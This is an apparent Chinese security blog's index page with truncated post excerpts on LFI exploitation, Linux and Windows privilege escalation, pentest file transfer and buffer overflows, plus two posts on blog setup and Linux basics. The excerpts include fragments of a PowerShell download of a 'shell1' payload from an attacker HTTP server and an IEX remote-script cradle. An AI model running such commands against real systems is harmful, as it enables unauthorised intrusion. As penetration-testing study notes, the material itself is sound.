LFI漏洞利用 LFI 漏洞的利用 参考链接1 参考链接2 LFI(本地文件包含漏洞),这篇文章将介绍有关该漏洞的一些利用 1、phpinfo 漏洞信息利用 将LFI漏洞转变为远程代码执行(RCE)漏洞的竞争条件,服务器端需要满足以下条件: LFI漏洞 任何显示PHPInfo()配置输出的脚本 脚本下载地址 得到脚本后,我们需要修改脚本中的攻击载荷, 使用命令 locate php-reverse 定 2021-12-12 渗透测试 #渗透测试 #漏洞利用
Linux漏洞扫描与提权 Linux漏洞扫描与提权漏洞扫描 msf 1use post/multi/recon/local_exploit_suggester windows-exploit-suggester.py 需要安装pip2 pspy 1需要先给pspy脚本执行权力才能执行 linPEAS 1git clone https://github.com/mxrmiss/PEASS-ng.git 2021-12-12 渗透测试 #渗透测试 #漏洞利用 #linux
Windows漏洞扫描与提权 windows漏洞扫描与提权漏洞扫描 使用msf 1use post/multi/recon/local_exploit_suggester 脚本 Sherlock 使用方法 12345678>初步使用本地加载脚本>Import-Module Sherlock.ps1>远程加载脚本>IEX (New-Object System.Net.Webclient).D 2021-12-12 渗透测试 #渗透测试 #漏洞利用 #windows
博客搭建 1. 准备工作 博客框架:Hexo 博客主题:Fluid, Ayer, butterfly 主机:阿里云轻量级应用服务器 配置:2核2G 60GB 图床:阿里云OSS 软件:oss-browser(阿里云OSS适配) 写作工具:Typora 图床软件:PicGo 博客备份:Github,Gitee,Onedrive 1.1 博客框架选择 我采用的是Hexo作为我的博客框架,理由是 2021-12-12 blog #blog #hexo
渗透测试之文件传输 文件传输 首先要在本地机器上开启HTTP服务(在被传文件的同一路径下): 12python2 -m SimpleHTTPServerpython3 -m http.sever windows powershell 1PowerShell (new-object Net.WebClient).DownloadFile('http://10.10.14.5:8082/shell1. 2021-12-12 渗透测试 #渗透测试
缓冲区溢出流程 缓冲区溢出流程一、Immunity Debugger 最好以管理员的身份运行Innunity debugger 通常有两种方法可以使用 Immunity Debugger 来调试应用程序: 确保应用程序正在运行,打开 Immunity Debugger,然后使用File -> Attach调试器攻击正在运行的进程。 打开 Immunity Debugger,然后使用它File -&g 2021-12-12 渗透测试 #渗透测试 #bufferover
Linux基础操作 本笔记的友情链接 常用目录介绍 boot 存放启动文件 dev 存放设备文件 etc 存放配置文件 home 普通用户家目录,以/home/$username的方式存放 media 移动存储自动挂载目录,以 /media/$device_name的方式来存放 mnt 手动挂载目录 opt 三方软件安装目录 pr 2020-09-14 linux #linux
linux压缩和解压缩命令大全 linux压缩和解压缩命令大全 tar命令 解包:tar zxvf FileName.tar 打包:tar czvf FileName.tar DirName gz命令 解压1:gunzip FileName.gz 解压2:gzip -d FileName.gz 压缩:gzip FileName .tar.gz 和 .tgz 解压:tar zxvf 2020-09-14 linux #linux